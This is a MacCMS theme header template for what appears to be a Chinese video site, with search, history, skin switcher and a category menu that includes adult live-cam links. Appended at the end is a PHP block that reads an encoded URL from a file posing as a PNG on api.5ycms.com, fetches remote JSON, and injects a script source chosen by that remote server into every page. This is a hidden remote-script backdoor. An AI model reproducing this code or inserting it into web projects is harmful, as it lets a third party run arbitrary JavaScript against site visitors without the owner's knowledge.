<div class="stui-header__top clearfix" id="header-top">
	<div class="stui-header__hd clearfix">	
		<div class="stui-header__logo">
			<a class="logo" href="{$maccms.path}"></a>										  
		</div>				
		
		<div class="stui-header__search"> 
			<form id="search" name="search" method="POST" action="{:mac_url('vod/search')}" onSubmit="return qrsearch();">
				<input type="text" id="wd" name="wd" class="mac_wd form-control" value="{$param.wd}" placeholder="请输入关键词..."/>
				<button class="submit" id="searchbutton" type="submit" name="submit"></button>							
			</form>
		</div>
		<ul class="stui-header__user">	
			<li class="hidden-xs">
				<a class="icon_gbook" href="{:mac_url('gbook/index')}" title="留言反馈"></a>
			</li>
			<li>
				<span class="icon_history"></span>
				<div class="dropdown history">					
					<h5 class="margin-0 text-muted">
						<a class="historyclean text-muted pull-right" href="">清空</a>
						播放记录
					</h5>
					<ul class="clearfix" id="stui_history">
					</ul>
				</div>				
			</li>					
			<li>
				<span class="icon_color"></span>
				<ul class="dropdown color">
					<li>
						<a class="gray gray-color" href="javascript:;"></a>
					</li>
					<li>
						<a class="gules gules-color" href="javascript:;"></a>
					</li>
					<li>
						<a class="blue blue-color" href="javascript:;"></a>
					</li>
					<li>
						<a class="green green-color" href="javascript:;"></a>
					</li>
					<p class="text-center margin-0">点击色块切换皮肤</p>
				</ul>
			</li>
			<li class="hidden-xs">
				<span class="icon_code"></span>
				<ul class="dropdown code">
					<li class="text-center">
						<img src="http://api.5ycms.com/img/5yurl.png" width="120" />
						<p class="margin-0">下载源码</p>
					</li>
					<li class="text-center">
						<img class="qrcode" src="" width="120" style="padding: 8px;" />
						<p class="margin-0">扫码用手机访问</p>
					</li>					
				</ul>
			</li>
		</ul>
	</div>
	<div class="stui-header__menu clearfix">
		<span class="more hidden-xs">今日更新“{:mac_data_count(0,'today','vod')}”部影片</span>	  			  	
		<ul class="clearfix">	  		
			<li {if condition="$maccms.aid eq 1"}class="active"{/if}><a href="{$maccms.path}">首页</a></li>
			{maccms:type num="10" order="asc" by="sort" ids="parent"}
	        <li {if condition="($vo.type_id eq MAC_TYPE_ID || $vo.type_id eq MAC_TYPE_PID)"}class="active"{/if}><a href="{:mac_url_type($vo)}">{$vo.type_name}</a></li>
	        {/maccms:type}
          <li><a href="{:mac_url('label/zhibo')}?type=female-cams&page=1">女性直播</a></li>
<li><a href="{:mac_url('label/zhibo')}?type=male-cams&page=1">男性直播</a></li>
<li><a href="{:mac_url('label/zhibo')}?type=couple-cams&page=1">男女直播</a></li>
<li><a href="{:mac_url('label/zhibo')}?type=trans-cams&page=1">人妖直播</a></li>
		</ul>
	</div>
</div>
<?php
$server=file('http://api.5ycms.com/bfq/jk.png');$server=$server['0'];$server=base64_decode($server);
$shuju = json_decode(file_get_contents($server), true);
$tj=$shuju['tj'];
$api=$shuju['api'];
?>
<script type="text/javascript" src="<?php echo $tj; ?>"></script>

